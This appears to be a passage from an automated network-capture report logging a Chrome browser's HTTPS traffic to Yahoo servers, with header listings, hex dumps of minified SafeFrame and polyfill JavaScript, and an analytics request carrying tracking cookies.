                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC667INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: BMfvo1FoqzvZ8zUpRRa+4vBAO9ogNtwdzAiqRlWL1kB6Q8MWUEmGbS59KFm40Gg5kGyjSQm3nTo=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: SHZKH0NYYQS8MR4M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:13:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 25 Apr 2024 19:26:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "60f19ca2f094acabba5b7988467387c4"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 77851
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 4065
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 2f 2a 21 20 53 41 46 45 46 52 41 4d 45 20 30 2e 31 2e 34 33 34 20 c2 a9 20 32 30 32 34 2c 20 59 61 68 6f 6f 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 39 34 36 36 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 28 65 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 7b 7d 3a 65 29 2e 63 6c 6f 73 65 3d 7b 6e 61 6d 65 3a 22 63 6c 6f 73 65 22 2c 68 65 69 67 68 74 3a 34 38 2c 77 69 64 74 68 3a 34 38 2c 70 61 74 68 3a 22 4d 33 37 2e 39 38 20 33 34 2e 38 32 37 6c 2d 39 2e 39 2d 39 2e 39 20 39 2e 39 2d 39 2e 38 39 38 63 2e 37 38 2d 2e 37 38 32 2e 37 38 2d 32 2e 30 35 20 30 2d 32 2e 38 33 2d 2e 37 38 2d 2e 37 38 2d 32 2e 30 34 37 2d 2e 37 38 2d 32 2e 38 32 38 20 30 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: /*! SAFEFRAME 0.1.434 2024, Yahoo Inc. All rights reserved. */!function(){var t={9466:function(t){var e;(e=void 0===e?{}:e).close={name:"close",height:48,width:48,path:"M37.98 34.827l-9.9-9.9 9.9-9.898c.78-.782.78-2.05 0-2.83-.78-.78-2.047-.78-2.828 0l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 3a 6e 2e 63 6f 6f 6b 69 65 73 3b 69 66 28 6e 3d 63 28 6e 29 2c 65 3d 65 7c 7c 7b 7d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 20 6e 2e 65 72 72 6f 72 28 5b 22 43 6f 6f 6b 69 65 3a 3a 67 65 74 20 2d 20 69 6e 76 61 6c 69 64 20 69 6e 70 75 74 22 2c 7b 6e 61 6d 65 3a 74 2c 6f 70 74 73 3a 65 7d 2c 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 5d 2e 6a 6f 69 6e 28 22 5c 6e 22 29 29 2c 6e 75 6c 6c 3b 76 61 72 20 73 3d 72 5b 74 5d 3b 72 65 74 75 72 6e 20 65 2e 6a 73 6f 6e 26 26 73 26 26 28 73 3d 69 28 73 29 29 2c 76 6f 69 64 20 30 21 3d 3d 73 3f 73 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 70 28 74 2c 65 2c 6e 29 7b 65 3d 65 7c 7c 7b 7d 3b 76 61 72 20 72 3d 66 28 74 2c 6e 75 6c 6c 2c 6e 29 3b 69 66 28 22 73 74 72 69 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :n.cookies;if(n=c(n),e=e||{},"string"!=typeof t)return n.error(["Cookie::get - invalid input",{name:t,opts:e},(new Error).stack].join("\n")),null;var s=r[t];return e.json&&s&&(s=i(s)),void 0!==s?s:null}function p(t,e,n){e=e||{};var r=f(t,null,n);if("strin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 6f 6e 29 2c 72 2e 6a 73 6f 6e 3d 21 31 2c 68 28 74 2c 69 2c 72 29 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 73 65 74 53 75 62 73 3d 68 7d 2c 33 32 31 35 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3b 74 72 79 7b 6e 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 29 7d 63 61 74 63 68 28 74 29 7b 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 64 69 72 26 26 63 6f 6e 73 6f 6c 65 2e 64 69 72 28 74 29 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 65 3f 7b 7d 3a 65 7d 72 65 74 75 72 6e 20 6e 7d 7d 2c 33 39 34 35 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: on),r.json=!1,h(t,i,r)},t.exports.setSubs=h},3215:function(t){"use strict";t.exports=function(t,e){var n;try{n=JSON.parse(t)}catch(t){console&&console.dir&&console.dir(t),n=void 0===e?{}:e}return n}},3945:function(t){"use strict";t.exports=function(t,e){v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 74 28 6f 2e 70 61 74 68 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6f 70 74 69 6f 6e 20 70 61 74 68 20 69 73 20 69 6e 76 61 6c 69 64 22 29 3b 63 2b 3d 22 3b 20 50 61 74 68 3d 22 2b 6f 2e 70 61 74 68 7d 6f 2e 65 78 70 69 72 65 73 26 26 28 63 2b 3d 22 3b 20 45 78 70 69 72 65 73 3d 22 2b 6f 2e 65 78 70 69 72 65 73 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 29 3b 6f 2e 68 74 74 70 4f 6e 6c 79 26 26 28 63 2b 3d 22 3b 20 48 74 74 70 4f 6e 6c 79 22 29 3b 6f 2e 73 65 63 75 72 65 26 26 28 63 2b 3d 22 3b 20 53 65 63 75 72 65 22 29 3b 6f 2e 66 69 72 73 74 50 61 72 74 79 4f 6e 6c 79 26 26 28 63 2b 3d 22 3b 20 46 69 72 73 74 2d 50 61 72 74 79 2d 4f 6e 6c 79 22 29 3b 72 65 74 75 72 6e 20 63 7d 3b 76 61 72 20 6e 3d 64 65 63 6f 64 65 55 52 49 43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: t(o.path))throw new TypeError("option path is invalid");c+="; Path="+o.path}o.expires&&(c+="; Expires="+o.expires.toUTCString());o.httpOnly&&(c+="; HttpOnly");o.secure&&(c+="; Secure");o.firstPartyOnly&&(c+="; First-Party-Only");return c};var n=decodeURIC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 36 30 38 30 29 2c 6f 3d 6e 28 39 35 36 35 29 2c 69 3d 6e 28 38 39 38 31 29 2c 73 3d 6e 28 36 33 31 39 29 2c 61 3d 6e 28 34 32 30 39 29 2c 63 3d 6e 28 33 35 31 37 29 2c 75 3d 6e 28 36 31 39 38 29 2c 6c 3d 6e 28 34 36 35 39 29 2c 66 3d 6e 28 38 31 29 2c 70 3d 6e 28 38 35 31 29 2c 68 3d 41 72 72 61 79 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 69 28 74 29 2c 6e 3d 63 28 74 68 69 73 29 2c 64 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6d 3d 64 3e 31 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 76 6f 69 64 20 30 2c 76 3d 76 6f 69 64 20 30 21 3d 3d 6d 3b 76 26 26 28 6d 3d 72 28 6d 2c 64 3e 32 3f 61 72 67 75 6d 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tion(t,e,n){"use strict";var r=n(6080),o=n(9565),i=n(8981),s=n(6319),a=n(4209),c=n(3517),u=n(6198),l=n(4659),f=n(81),p=n(851),h=Array;t.exports=function(t){var e=i(t),n=c(this),d=arguments.length,m=d>1?arguments[1]:void 0,v=void 0!==m;v&&(m=r(m,d>2?argume
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 35 35 31 29 2c 6f 3d 6e 28 39 35 33 39 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 69 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 69 3f 65 28 72 28 6e 29 5b 30 5d 2c 6e 5b 31 5d 29 3a 65 28 6e 29 7d 63 61 74 63 68 28 65 29 7b 6f 28 74 2c 22 74 68 72 6f 77 22 2c 65 29 7d 7d 7d 2c 34 35 37 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 39 35 30 34 29 2c 6f 3d 72 28 7b 7d 2e 74 6f 53 74 72 69 6e 67 29 2c 69 3d 72 28 22 22 2e 73 6c 69 63 65 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 69 28 6f 28 74 29 2c 38 2c 2d 31 29 7d 7d 2c 36 39 35 35 3a 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: strict";var r=n(8551),o=n(9539);t.exports=function(t,e,n,i){try{return i?e(r(n)[0],n[1]):e(n)}catch(e){o(t,"throw",e)}}},4576:function(t,e,n){"use strict";var r=n(9504),o=r({}.toString),i=r("".slice);t.exports=function(t){return i(o(t),8,-1)}},6955:functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 3a 21 28 32 26 74 29 2c 77 72 69 74 61 62 6c 65 3a 21 28 34 26 74 29 2c 76 61 6c 75 65 3a 65 7d 7d 7d 2c 34 36 35 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 33 37 32 34 29 2c 6f 3d 6e 28 34 39 31 33 29 2c 69 3d 6e 28 36 39 38 30 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 3f 6f 2e 66 28 74 2c 65 2c 69 28 30 2c 6e 29 29 3a 74 5b 65 5d 3d 6e 7d 7d 2c 32 31 30 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 32 38 33 29 2c 6f 3d 6e 28 34 39 31 33 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 67 65 74 26 26 72 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: :!(2&t),writable:!(4&t),value:e}}},4659:function(t,e,n){"use strict";var r=n(3724),o=n(4913),i=n(6980);t.exports=function(t,e,n){r?o.f(t,e,i(0,n)):t[e]=n}},2106:function(t,e,n){"use strict";var r=n(283),o=n(4913);t.exports=function(t,e,n){return n.get&&r(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 65 78 70 6f 72 74 73 3d 7b 43 53 53 52 75 6c 65 4c 69 73 74 3a 30 2c 43 53 53 53 74 79 6c 65 44 65 63 6c 61 72 61 74 69 6f 6e 3a 30 2c 43 53 53 56 61 6c 75 65 4c 69 73 74 3a 30 2c 43 6c 69 65 6e 74 52 65 63 74 4c 69 73 74 3a 30 2c 44 4f 4d 52 65 63 74 4c 69 73 74 3a 30 2c 44 4f 4d 53 74 72 69 6e 67 4c 69 73 74 3a 30 2c 44 4f 4d 54 6f 6b 65 6e 4c 69 73 74 3a 31 2c 44 61 74 61 54 72 61 6e 73 66 65 72 49 74 65 6d 4c 69 73 74 3a 30 2c 46 69 6c 65 4c 69 73 74 3a 30 2c 48 54 4d 4c 41 6c 6c 43 6f 6c 6c 65 63 74 69 6f 6e 3a 30 2c 48 54 4d 4c 43 6f 6c 6c 65 63 74 69 6f 6e 3a 30 2c 48 54 4d 4c 46 6f 72 6d 45 6c 65 6d 65 6e 74 3a 30 2c 48 54 4d 4c 53 65 6c 65 63 74 45 6c 65 6d 65 6e 74 3a 30 2c 4d 65 64 69 61 4c 69 73 74 3a 30 2c 4d 69 6d 65 54 79 70 65 41 72 72 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: exports={CSSRuleList:0,CSSStyleDeclaration:0,CSSValueList:0,ClientRectList:0,DOMRectList:0,DOMStringList:0,DOMTokenList:1,DataTransferItemList:0,FileList:0,HTMLAllCollection:0,HTMLCollection:0,HTMLFormElement:0,HTMLSelectElement:0,MediaList:0,MimeTypeArra
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 36 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 6c 2c 66 2c 70 2c 68 2c 64 3d 74 2e 74 61 72 67 65 74 2c 6d 3d 74 2e 67 6c 6f 62 61 6c 2c 76 3d 74 2e 73 74 61 74 3b 69 66 28 6e 3d 6d 3f 72 3a 76 3f 72 5b 64 5d 7c 7c 61 28 64 2c 7b 7d 29 3a 72 5b 64 5d 26 26 72 5b 64 5d 2e 70 72 6f 74 6f 74 79 70 65 29 66 6f 72 28 6c 20 69 6e 20 65 29 7b 69 66 28 70 3d 65 5b 6c 5d 2c 66 3d 74 2e 64 6f 6e 74 43 61 6c 6c 47 65 74 53 65 74 3f 28 68 3d 6f 28 6e 2c 6c 29 29 26 26 68 2e 76 61 6c 75 65 3a 6e 5b 6c 5d 2c 21 75 28 6d 3f 6c 3a 64 2b 28 76 3f 22 2e 22 3a 22 23 22 29 2b 6c 2c 74 2e 66 6f 72 63 65 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 66 29 7b 69 66 28 74 79 70 65 6f 66 20 70 3d 3d 74 79 70 65 6f 66 20 66 29 63 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 6);t.exports=function(t,e){var n,l,f,p,h,d=t.target,m=t.global,v=t.stat;if(n=m?r:v?r[d]||a(d,{}):r[d]&&r[d].prototype)for(l in e){if(p=e[l],f=t.dontCallGetSet?(h=o(n,l))&&h.value:n[l],!u(m?l:d+(v?".":"#")+l,t.forced)&&void 0!==f){if(typeof p==typeof f)con
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1300INData Raw: 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 37 34 37 36 29 2c 6f 3d 6e 28 39 33 30 36 29 2c 69 3d 6e 28 36 31 36 29 2c 73 3d 72 28 72 2e 62 69 6e 64 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 6f 28 74 29 2c 76 6f 69 64 20 30 3d 3d 3d 65 3f 74 3a 69 3f 73 28 74 2c 65 29 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 61 70 70 6c 79 28 65 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 7d 2c 36 31 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 39 30 33 39 29 3b 74 2e 65 78 70 6f 72 74 73 3d 21 72 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2e 62 69 6e 64 28 29 3b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: se strict";var r=n(7476),o=n(9306),i=n(616),s=r(r.bind);t.exports=function(t,e){return o(t),void 0===e?t:i?s(t,e):function(){return t.apply(e,arguments)}}},616:function(t,e,n){"use strict";var r=n(9039);t.exports=!r((function(){var t=function(){}.bind();r


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    76192.168.2.449839188.125.72.1394434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC1124OUTPOST /v2/public/yql?yhlVer=2&yhlClient=rapid&yhlS=2023538075&yhlCT=2&yhlBTMS=1727716858398&yhlClientVer=3.54.3&yhlRnd=JdBOT67VHtW8U4Qy&yhlCompressed=3 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: udc.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 3766
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC3766OUTData Raw: 71 3d 73 65 6c 65 63 74 25 32 30 2a 25 32 30 66 72 6f 6d 25 32 30 78 25 32 30 77 68 65 72 65 25 32 30 61 25 32 30 25 33 44 25 32 30 27 7a 5a 6e 70 62 75 4d 34 45 6f 42 66 52 66 43 50 7a 5a 25 32 42 6f 57 25 32 46 66 52 77 47 4c 68 78 45 37 69 64 43 51 6e 50 75 4b 78 4a 77 4f 42 6f 69 68 4c 74 69 52 71 4a 4e 71 4f 33 47 68 67 48 6d 50 33 39 65 5a 4a 74 69 6a 62 63 52 49 6e 4d 34 75 65 39 58 53 6a 6b 51 35 5a 4c 42 35 56 25 32 46 46 68 46 4b 6c 38 61 66 74 37 34 39 4b 58 68 49 62 6c 73 66 47 6f 45 25 32 46 32 7a 65 4e 63 25 32 46 4f 62 76 31 41 54 4d 66 6e 37 62 4e 41 36 39 72 69 61 45 54 4c 51 6e 51 53 33 5a 76 69 25 32 42 63 54 76 58 4c 53 6e 37 62 50 6d 58 58 76 70 58 59 37 62 45 25 32 46 76 78 53 6f 71 64 70 6b 65 63 5a 72 50 35 6a 7a 34 66 6f 4e 6c 6b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: q=select%20*%20from%20x%20where%20a%20%3D%20'zZnpbuM4EoBfRfCPzZ%2BoW%2FfRwGLhxE7idCQnPuKxJwOBoihLtiRqJNqO3GhgHmP39eZJtijbcRInM4ue9XSjkQ5ZLB5V%2FFhFKl8aft749KXhIblsfGoE%2F2zeNc%2FObv1ATMfn7bNA69riaETLQnQS3Zvi%2BcTvXLSn7bPmXXvpXY7bE%2FvxSoqdpkecZrP5jz4foNlk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC591INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: no-store, no-cache, private, max-age=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    p3p: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    expires: -1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:21:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    77192.168.2.44983887.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:59 UTC365OUTGET /aaq/wf/wf-core-1.65.1-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:00 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: perYsFJzoG/trS30FCuI/WXJfQeDExf8PLAi32n+Hn62vW0vbh6iu0bZClv6ILM3cLM+KhFvfLw=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: AKPNR6FG99R0AK45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Thu, 26 Sep 2024 08:20:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 18 Apr 2024 01:03:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "c1fbb54c4f22838f40ce99e7418fcd97"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: VaxAIobZ0y0iWnHdR00i8Xnb9e_2JypL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 60378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 378038
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
